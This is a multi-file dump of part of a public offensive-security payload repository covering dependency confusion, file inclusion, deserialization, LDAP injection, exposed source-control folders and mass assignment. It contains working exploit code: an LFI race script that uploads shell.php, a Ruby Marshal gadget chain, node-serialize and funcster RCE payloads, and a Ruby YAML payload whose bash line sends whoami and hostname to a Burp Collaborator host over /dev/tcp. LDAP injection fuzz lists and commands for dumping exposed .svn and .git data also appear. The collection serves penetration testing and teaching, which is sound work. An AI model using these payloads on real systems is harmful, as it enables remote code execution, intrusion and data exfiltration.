-------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Cross-Site Request Forgery/Images/CSRF-CheatSheet.png -------------------------------------------------------------------------------- /DISCLAIMER.md: -------------------------------------------------------------------------------- 1 | # DISCLAIMER 2 | 3 | The authors and contributors of this repository disclaim any and all responsibility for the misuse of the information, tools, or techniques described herein. The content is provided solely for educational and research purposes. Users are strictly advised to utilize this information in accordance with applicable laws and regulations and only on systems for which they have explicit authorization. 
4 | 5 | By accessing and using this repository, you agree to: 6 | 7 | * Refrain from using the provided information for any unethical or illegal activities. 8 | * Ensure that all testing and experimentation are conducted responsibly and with proper authorization. 9 | * Acknowledge that any actions you take based on the contents of this repository are solely your responsibility. 10 | 11 | Neither the authors nor contributors shall be held liable for any damages, direct or indirect, resulting from the misuse or unauthorized application of the knowledge contained herein. Always act mindfully, ethically, and within the boundaries of the law. 12 | -------------------------------------------------------------------------------- /Dependency Confusion/README.md: -------------------------------------------------------------------------------- 1 | # Dependency Confusion 2 | 3 | > A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Methodology](#methodology) 9 | * [NPM Example](#npm-example) 10 | * [References](#references) 11 | 12 | ## Tools 13 | 14 | * [visma-prodsec/confused](https://github.com/visma-prodsec/confused) - Tool to check for dependency confusion vulnerabilities in multiple package management systems 15 | * [synacktiv/DepFuzzer](https://github.com/synacktiv/DepFuzzer) - Tool used to find dependency confusion, or projects whose owner's email can be taken over. 16 | 17 | ## Methodology 18 | 19 | Look for `npm`, `pip` or `gem` packages; the methodology is the same: register a public package with the same name as a private one used by the company, then wait for it to be used. 
20 | 21 | * **DockerHub**: Dockerfile image 22 | * **JavaScript** (npm): package.json 23 | * **MVN** (maven): pom.xml 24 | * **PHP** (composer): composer.json 25 | * **Python** (pypi): requirements.txt 26 | 27 | ### NPM Example 28 | 29 | * List all the packages (i.e. from package.json, composer.json, ...) 30 | * Find the packages that are missing from [www.npmjs.com](https://www.npmjs.com/) 31 | * Register and create a **public** package with the same name 32 | * Package example: [0xsapra/dependency-confusion-expoit](https://github.com/0xsapra/dependency-confusion-expoit) 33 | 34 | ## References 35 | 36 | * [Exploiting Dependency Confusion - Aman Sapra (0xsapra) - 2 Jul 2021](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion) 37 | * [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) 38 | * [3 Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://web.archive.org/web/20210210121930/https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/) 39 | * [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained - 22 févr. 
2021](https://www.youtube.com/watch?v=zFHJwehpBrU) 40 | -------------------------------------------------------------------------------- /File Inclusion/Files/uploadlfi.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from builtins import range 3 | import itertools 4 | import requests 5 | import string 6 | import sys 7 | 8 | print('[+] Trying to win the race') 9 | f = {'file': open('shell.php', 'rb')} 10 | for _ in range(4096 * 4096): 11 | requests.post('http://target.com/index.php?c=index.php', f) 12 | 13 | 14 | print('[+] Bruteforcing the inclusion') 15 | for fname in itertools.combinations(string.ascii_letters + string.digits, 6): 16 | url = 'http://target.com/index.php?c=/tmp/php' + fname 17 | r = requests.get(url) 18 | if 'load average' in r.text: # 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /Headless Browser/files/window_location_js.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | -------------------------------------------------------------------------------- /Hidden Parameters/README.md: -------------------------------------------------------------------------------- 1 | # HTTP Hidden Parameters 2 | 3 | > Web applications often have hidden or undocumented parameters that are not exposed in the user interface. Fuzzing can help discover these parameters, which might be vulnerable to various attacks. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Methodology](#methodology) 9 | * [Bruteforce Parameters](#bruteforce-parameters) 10 | * [Old Parameters](#old-parameters) 11 | * [References](#references) 12 | 13 | ## Tools 14 | 15 | * [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - Burp extension to identify hidden, unlinked parameters. 
16 | * [s0md3v/Arjun](https://github.com/s0md3v/Arjun) - HTTP parameter discovery suite 17 | * [Sh1Yo/x8](https://github.com/Sh1Yo/x8) - Hidden parameters discovery suite 18 | * [tomnomnom/waybackurls](https://github.com/tomnomnom/waybackurls) - Fetch all the URLs that the Wayback Machine knows about for a domain 19 | * [devanshbatham/ParamSpider](https://github.com/devanshbatham/ParamSpider) - Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing 20 | 21 | ## Methodology 22 | 23 | ### Bruteforce Parameters 24 | 25 | * Use wordlists of common parameters and send them, look for unexpected behavior from the backend. 26 | 27 | ```ps1 28 | x8 -u "https://example.com/" -w 29 | x8 -u "https://example.com/" -X POST -w 30 | ``` 31 | 32 | Wordlist examples: 33 | 34 | * [Arjun/large.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/large.txt) 35 | * [Arjun/medium.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/medium.txt) 36 | * [Arjun/small.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/small.txt) 37 | * [samlists/sam-cc-parameters-lowercase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-lowercase-all.txt) 38 | * [samlists/sam-cc-parameters-mixedcase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-mixedcase-all.txt) 39 | 40 | ### Old Parameters 41 | 42 | Explore all the URL from your targets to find old parameters. 
43 | 44 | * Browse the [Wayback Machine](http://web.archive.org/) 45 | * Look through the JS files to discover unused parameters 46 | 47 | ## References 48 | 49 | * [Hacker tools: Arjun – The parameter discovery tool - Intigriti - May 17, 2021](https://blog.intigriti.com/2021/05/17/hacker-tools-arjun-the-parameter-discovery-tool/) 50 | * [Parameter Discovery: A quick guide to start - YesWeHack - April 20, 2022](http://web.archive.org/web/20220420123306/https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start) 51 | -------------------------------------------------------------------------------- /Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | class Gem::StubSpecification 4 | def initialize; end 5 | end 6 | 7 | 8 | stub_specification = Gem::StubSpecification.new 9 | stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2") 10 | 11 | puts "STEP n" 12 | stub_specification.name rescue nil 13 | puts 14 | 15 | 16 | class Gem::Source::SpecificFile 17 | def initialize; end 18 | end 19 | 20 | specific_file = Gem::Source::SpecificFile.new 21 | specific_file.instance_variable_set(:@spec, stub_specification) 22 | 23 | other_specific_file = Gem::Source::SpecificFile.new 24 | 25 | puts "STEP n-1" 26 | specific_file <=> other_specific_file rescue nil 27 | puts 28 | 29 | 30 | $dependency_list= Gem::DependencyList.new 31 | $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) 32 | 33 | puts "STEP n-2" 34 | $dependency_list.each{} rescue nil 35 | puts 36 | 37 | 38 | class Gem::Requirement 39 | def marshal_dump 40 | [$dependency_list] 41 | end 42 | end 43 | 44 | payload = Marshal.dump(Gem::Requirement.new) 45 | 46 | puts "STEP n-3" 47 | Marshal.load(payload) rescue nil 48 | puts 49 | 50 | 51 | puts "VALIDATION (in fresh ruby process):" 52 | IO.popen("ruby -e 'Marshal.load(STDIN.read) 
rescue nil'", "r+") do |pipe| 53 | pipe.print payload 54 | pipe.close_write 55 | puts pipe.gets 56 | puts 57 | end 58 | 59 | puts "Payload (hex):" 60 | puts payload.unpack('H*')[0] 61 | puts 62 | 63 | 64 | require "base64" 65 | puts "Payload (Base64 encoded):" 66 | puts Base64.encode64(payload) -------------------------------------------------------------------------------- /Insecure Deserialization/Files/node-serialize.js: -------------------------------------------------------------------------------- 1 | var y = { 2 | rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}, 3 | } 4 | var serialize = require('node-serialize'); 5 | console.log("Serialized: \n" + serialize.serialize(y)); -------------------------------------------------------------------------------- /Insecure Deserialization/Files/ruby-serialize.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | - !ruby/object:Gem::Installer 3 | i: x 4 | - !ruby/object:Gem::SpecFetcher 5 | i: y 6 | - !ruby/object:Gem::Requirement 7 | requirements: 8 | !ruby/object:Gem::Package::TarReader 9 | io: &1 !ruby/object:Net::BufferedIO 10 | io: &1 !ruby/object:Gem::Package::TarReader::Entry 11 | read: 0 12 | header: "abc" 13 | debug_output: &1 !ruby/object:Net::WriteAdapter 14 | socket: &1 !ruby/object:Gem::RequestSet 15 | sets: !ruby/object:Net::WriteAdapter 16 | socket: !ruby/module 'Kernel' 17 | method_id: :system 18 | git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'" 19 | method_id: :resolve -------------------------------------------------------------------------------- /Insecure Deserialization/Images/NETNativeFormatters.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Insecure 
Deserialization/Images/NETNativeFormatters.png -------------------------------------------------------------------------------- /Insecure Deserialization/Node.md: -------------------------------------------------------------------------------- 1 | # Node Deserialization 2 | 3 | > Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication. 4 | 5 | ## Summary 6 | 7 | * [Methodology](#methodology) 8 | * [node-serialize](#node-serialize) 9 | * [funcster](#funcster) 10 | * [References](#references) 11 | 12 | ## Methodology 13 | 14 | * In Node source code, look for: 15 | 16 | * `node-serialize` 17 | * `serialize-to-js` 18 | * `funcster` 19 | 20 | ### node-serialize 21 | 22 | > An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE). 23 | 24 | 1. Generate a serialized payload 25 | 26 | ```js 27 | var y = { 28 | rce : function(){ 29 | require('child_process').exec('ls /', function(error, 30 | stdout, stderr) { console.log(stdout) }); 31 | }, 32 | } 33 | var serialize = require('node-serialize'); 34 | console.log("Serialized: \n" + serialize.serialize(y)); 35 | ``` 36 | 37 | 2. Add bracket `()` to force the execution 38 | 39 | ```js 40 | {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"} 41 | ``` 42 | 43 | 3. 
Send the payload 44 | 45 | ### funcster 46 | 47 | ```js 48 | {"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}} 49 | ``` 50 | 51 | ## References 52 | 53 | * [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941) 54 | * [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf) 55 | * [NodeJS Deserialization - gonczor - January 8, 2020](https://blacksheephacks.pl/nodejs-deserialization/) 56 | -------------------------------------------------------------------------------- /Insecure Direct Object References/Images/idor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Insecure Direct Object References/Images/idor.png -------------------------------------------------------------------------------- /Insecure Management Interface/Intruder/springboot_actuator.txt: -------------------------------------------------------------------------------- 1 | auditevents 2 | autoconfig 3 | beans 4 | caches 5 | conditions 6 | configprops 7 | dump 8 | env 9 | flyway 10 | health 11 | heapdump 12 | httptrace 13 | info 14 | integrationgraph 15 | jolokia 16 | logfile 17 | loggers 18 | liquibase 19 | metrics 20 | mappings 21 | prometheus 22 | scheduledtasks 23 | sessions 24 | shutdown 25 | threaddump 26 | trace 27 | actuator/auditevents 28 | actuator/autoconfig 29 | actuator/beans 30 | actuator/caches 31 | actuator/conditions 32 | actuator/configprops 33 | actuator/dump 34 | actuator/env 35 | actuator/flyway 36 | actuator/health 37 | 
actuator/heapdump 38 | actuator/httptrace 39 | actuator/info 40 | actuator/integrationgraph 41 | actuator/jolokia 42 | actuator/logfile 43 | actuator/loggers 44 | actuator/liquibase 45 | actuator/metrics 46 | actuator/mappings 47 | actuator/prometheus 48 | actuator/scheduledtasks 49 | actuator/sessions 50 | actuator/shutdown 51 | actuator/threaddump 52 | actuator/trace -------------------------------------------------------------------------------- /Insecure Management Interface/README.md: -------------------------------------------------------------------------------- 1 | # Insecure Management Interface 2 | 3 | > Insecure Management Interface refers to vulnerabilities in administrative interfaces used for managing servers, applications, databases, or network devices. These interfaces often control sensitive settings and can have powerful access to system configurations, making them prime targets for attackers. 4 | > Insecure Management Interfaces may lack proper security measures, such as strong authentication, encryption, or IP restrictions, allowing unauthorized users to potentially gain control over critical systems. Common issues include using default credentials, unencrypted communications, or exposing the interface to the public internet. 5 | 6 | ## Summary 7 | 8 | * [Methodology](#methodology) 9 | * [References](#references) 10 | 11 | ## Methodology 12 | 13 | Insecure Management Interface vulnerabilities arise when administrative interfaces of systems or applications are improperly secured, allowing unauthorized or malicious users to gain access, modify configurations, or exploit sensitive operations. These interfaces are often critical for maintaining, monitoring, and controlling systems and must be secured rigorously. 14 | 15 | * Lack of Authentication or Weak Authentication: 16 | * Interfaces accessible without requiring credentials. 17 | * Use of default or weak credentials (e.g., admin/admin). 
18 | 19 | ```ps1 20 | nuclei -t http/default-logins -u https://example.com 21 | ``` 22 | 23 | * Exposure to the Public Internet 24 | 25 | ```ps1 26 | nuclei -t http/exposed-panels -u https://example.com 27 | nuclei -t http/exposures -u https://example.com 28 | ``` 29 | 30 | * Sensitive data transmitted over plain HTTP or other unencrypted protocols 31 | 32 | **Examples**: 33 | 34 | * **Network Devices**: Routers, switches, or firewalls with default credentials or unpatched vulnerabilities. 35 | * **Web Applications**: Admin panels without authentication or exposed via predictable URLs (e.g., /admin). 36 | * **Cloud Services**: API endpoints without proper authentication or overly permissive roles. 37 | 38 | ## References 39 | 40 | * [CAPEC-121: Exploit Non-Production Interfaces - CAPEC - July 30, 2020](https://capec.mitre.org/data/definitions/121.html) 41 | * [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) 42 | * [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) 43 | -------------------------------------------------------------------------------- /Insecure Source Code Management/Bazaar.md: -------------------------------------------------------------------------------- 1 | # Bazaar 2 | 3 | > Bazaar (also known as bzr ) is a free, distributed version control system (DVCS) that helps you track project history over time and collaborate seamlessly with others. Developed by Canonical, Bazaar emphasizes ease of use, a flexible workflow, and rich features to cater to both individual developers and large teams. 
4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [rip-bzr.pl](#rip-bzrpl) 9 | * [bzr_dumper](#bzr_dumper) 10 | * [References](#references) 11 | 12 | ## Tools 13 | 14 | ### rip-bzr.pl 15 | 16 | * [kost/dvcs-ripper/rip-bzr.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl) 17 | 18 | ```powershell 19 | docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u 20 | ``` 21 | 22 | ### bzr_dumper 23 | 24 | * [SeahunOh/bzr_dumper](https://github.com/SeahunOh/bzr_dumper) 25 | 26 | ```powershell 27 | python3 dumper.py -u "http://127.0.0.1:5000/" -o source 28 | Created a standalone tree (format: 2a) 29 | [!] Target : http://127.0.0.1:5000/ 30 | [+] Start. 31 | [+] GET repository/pack-names 32 | [+] GET README 33 | [+] GET checkout/dirstate 34 | [+] GET checkout/views 35 | [+] GET branch/branch.conf 36 | [+] GET branch/format 37 | [+] GET branch/last-revision 38 | [+] GET branch/tag 39 | [+] GET b'154411f0f33adc3ff8cfb3d34209cbd1' 40 | [*] Finish 41 | ``` 42 | 43 | ```powershell 44 | bzr revert 45 | N application.py 46 | N database.py 47 | N static/ 48 | ``` 49 | 50 | ## References 51 | 52 | * [STEM CTF Cyber Challenge 2019 – My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://ctftime.org/writeup/13380) 53 | -------------------------------------------------------------------------------- /Insecure Source Code Management/Mercurial.md: -------------------------------------------------------------------------------- 1 | # Mercurial 2 | 3 | > Mercurial (also known as hg from the chemical symbol for mercury) is a distributed version control system (DVCS) designed for efficiency and scalability. Developed by Matt Mackall and first released in 2005, Mercurial is known for its speed, simplicity, and ability to handle large codebases. 
4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [rip-hg.pl](#rip-hgpl) 9 | * [References](#references) 10 | 11 | ## Tools 12 | 13 | ### rip-hg.pl 14 | 15 | * [kost/dvcs-ripper/master/rip-hg.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl) - Rip web accessible (distributed) version control systems: SVN/GIT/HG... 16 | 17 | ```powershell 18 | docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u 19 | ``` 20 | 21 | ## References 22 | 23 | * [my-chemical-romance - siunam - Feb 13, 2023](https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/) 24 | -------------------------------------------------------------------------------- /Insecure Source Code Management/README.md: -------------------------------------------------------------------------------- 1 | # Insecure Source Code Management 2 | 3 | > Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks. 4 | 5 | ## Summary 6 | 7 | * [Methodology](#methodology) 8 | * [Bazaar](./Bazaar.md) 9 | * [Git](./Git.md) 10 | * [Mercurial](./Mercurial.md) 11 | * [Subversion](./Subversion.md) 12 | * [Labs](#labs) 13 | * [References](#references) 14 | 15 | ## Methodology 16 | 17 | Exposing the version control system folders on a web server can lead to severe security risks, including: 18 | 19 | * **Source Code Leaks** : Attackers can download the entire source code repository, gaining access to the application's logic. 20 | * **Sensitive Information Exposure** : Embedded secrets, configuration files, and credentials might be present within the codebase. 
21 | * **Commit History Exposure** : Attackers can view past changes, revealing sensitive information that might have been previously exposed and later mitigated. 22 | 23 | The first step is to gather information about the target application. This can be done using various web reconnaissance tools and techniques. 24 | 25 | * **Manual Inspection** : Check URLs manually by navigating to common SCM paths. 26 | * Git: `http://target.com/.git/` 27 | * SVN: `http://target.com/.svn/` 28 | 29 | * **Automated Tools** : Refer to the page related to the specific technology. 30 | 31 | Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules. 32 | 33 | The NGINX rule below returns a `403 (Forbidden)` response instead of `404 (Not Found)` when hitting the `/.git` endpoint. 34 | 35 | ```ps1 36 | location /.git { 37 | deny all; 38 | } 39 | ``` 40 | 41 | For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (`http://target.com/.git/`), the data extraction can still be conducted when files can be read. 42 | 43 | ## Labs 44 | 45 | * [Root Me - Insecure Code Management](https://www.root-me.org/fr/Challenges/Web-Serveur/Insecure-Code-Management) 46 | 47 | ## References 48 | 49 | * [Hidden directories and files as a source of sensitive information about web application - Apr 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) 50 | -------------------------------------------------------------------------------- /Insecure Source Code Management/Subversion.md: -------------------------------------------------------------------------------- 1 | # Subversion 2 | 3 | > Subversion (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. 
in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Methodology](#methodology) 9 | * [References](#references) 10 | 11 | ## Tools 12 | 13 | * [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network. 14 | 15 | ```powershell 16 | python svn-extractor.py --url "url with .svn available" 17 | ``` 18 | 19 | ## Methodology 20 | 21 | ```powershell 22 | curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base 23 | ``` 24 | 25 | 1. Download the svn database from `http://server/path_to_vulnerable_site/.svn/wc.db` 26 | 27 | ```powershell 28 | INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); 29 | ``` 30 | 31 | 2. 
Download interesting files 32 | * remove `$sha1$` prefix 33 | * add `.svn-base` postfix 34 | * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case) 35 | * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` 36 | 37 | ## References 38 | 39 | * [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](http://blog.anantshri.info/svn-extractor-for-web-pentesters/) 40 | -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_FUZZ.txt: -------------------------------------------------------------------------------- 1 | * 2 | *)(& 3 | *))%00 4 | *()|%26' 5 | *()|&' 6 | *(|(mail=*)) 7 | *(|(objectclass=*)) 8 | *)(uid=*))(|(uid=* 9 | */* 10 | *| 11 | / 12 | // 13 | //* 14 | @* 15 | | 16 | admin* 17 | admin*)((|userpassword=*) 18 | admin*)((|userPassword=*) 19 | x' or name()='username' or 'x'='y 20 | ! 
21 | %21 22 | %26 23 | %28 24 | %29 25 | %2A%28%7C%28mail%3D%2A%29%29 26 | %2A%28%7C%28objectclass%3D%2A%29%29 27 | %2A%7C 28 | %7C 29 | & 30 | ( 31 | ) 32 | )(cn=))\x00 33 | *(|(mail=*)) 34 | *(|(objectclass=*)) 35 | */* 36 | *| 37 | / 38 | // 39 | //* 40 | @* 41 | x' or name()='username' or 'x'='y 42 | | 43 | *()|&' 44 | admin* 45 | admin*)((|userpassword=*) 46 | *)(uid=*))(|(uid=* 47 | -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_FUZZ_SMALL.txt: -------------------------------------------------------------------------------- 1 | * 2 | *)(& 3 | *))%00 4 | )(cn=))\x00 5 | *()|%26' 6 | *()|&' 7 | *(|(mail=*)) 8 | *(|(objectclass=*)) 9 | *)(uid=*))(|(uid=* 10 | */* 11 | *| 12 | / 13 | // 14 | //* 15 | @* 16 | | 17 | admin* 18 | admin*)((|userpassword=*) 19 | admin*)((|userPassword=*) 20 | x' or name()='username' or 'x'='ys -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_attributes.txt: -------------------------------------------------------------------------------- 1 | c 2 | cn 3 | co 4 | commonName 5 | dc 6 | facsimileTelephoneNumber 7 | givenName 8 | gn 9 | homePhone 10 | id 11 | jpegPhoto 12 | l 13 | mail 14 | mobile 15 | name 16 | o 17 | objectClass 18 | ou 19 | owner 20 | pager 21 | password 22 | sn 23 | st 24 | surname 25 | uid 26 | username 27 | userPassword 28 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Swissky 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and 
to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Mass Assignment/README.md: -------------------------------------------------------------------------------- 1 | # Mass Assignment 2 | 3 | > A mass assignment attack is a security vulnerability that occurs when a web application automatically assigns user-supplied input values to properties or variables of a program object. This can become an issue if a user is able to modify attributes they should not have access to, like a user's permissions or an admin flag. 4 | 5 | ## Summary 6 | 7 | * [Methodology](#methodology) 8 | * [Labs](#labs) 9 | * [References](#references) 10 | 11 | ## Methodology 12 | 13 | Mass assignment vulnerabilities are most common in web applications that use Object-Relational Mapping (ORM) techniques or functions to map user input to object properties, where properties can be updated all at once instead of individually. Many popular web development frameworks such as Ruby on Rails, Django, and Laravel (PHP) offer this functionality. 14 | 15 | For instance, consider a web application that uses an ORM and has a user object with the attributes `username`, `email`, `password`, and `isAdmin`. 
In a normal scenario, a user might be able to update their own username, email, and password through a form, which the server then assigns to the user object. 16 | 17 | However, an attacker may attempt to add an `isAdmin` parameter to the incoming data like so: 18 | 19 | ```json 20 | { 21 | "username": "attacker", 22 | "email": "attacker@email.com", 23 | "password": "unsafe_password", 24 | "isAdmin": true 25 | } 26 | ``` 27 | 28 | If the web application is not checking which parameters are allowed to be updated in this way, it might set the `isAdmin` attribute based on the user-supplied input, giving the attacker admin privileges 29 | 30 | ## Labs 31 | 32 | * [PentesterAcademy - Mass Assignment I](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1964) 33 | * [PentesterAcademy - Mass Assignment II](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1922) 34 | * [Root Me - API - Mass Assignment](https://www.root-me.org/en/Challenges/Web-Server/API-Mass-Assignment) 35 | 36 | ## References 37 | 38 | * [Hunting for Mass Assignment - Shivam Bathla - August 12, 2021](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda) 39 | * [Mass Assignment Cheat Sheet - OWASP - March 15, 2021](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html) 40 | * [What is Mass Assignment? 
Attacks and Security Tips - Yoan MONTOYA - June 15, 2023](https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/) 41 | -------------------------------------------------------------------------------- /Methodology and Resources/Bind Shell Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Bind Shell 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/shell-bind](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/) 4 | 5 | - [Perl](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#perl) 6 | - [Python](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#python) 7 | - [PHP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#php) 8 | - [Ruby](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ruby) 9 | - [Netcat Traditional](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-traditional) 10 | - [Netcat OpenBsd](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-openbsd) 11 | - [Ncat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ncat) 12 | - [Socat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#socat) 13 | - [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#powershell) 14 | -------------------------------------------------------------------------------- /Methodology and Resources/Cloud - AWS Pentest.md: -------------------------------------------------------------------------------- 1 | # Cloud - AWS 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cloud/aws](https://github.com/swisskyrepo/InternalAllTheThings/) 4 | 5 | - [Cloud - 
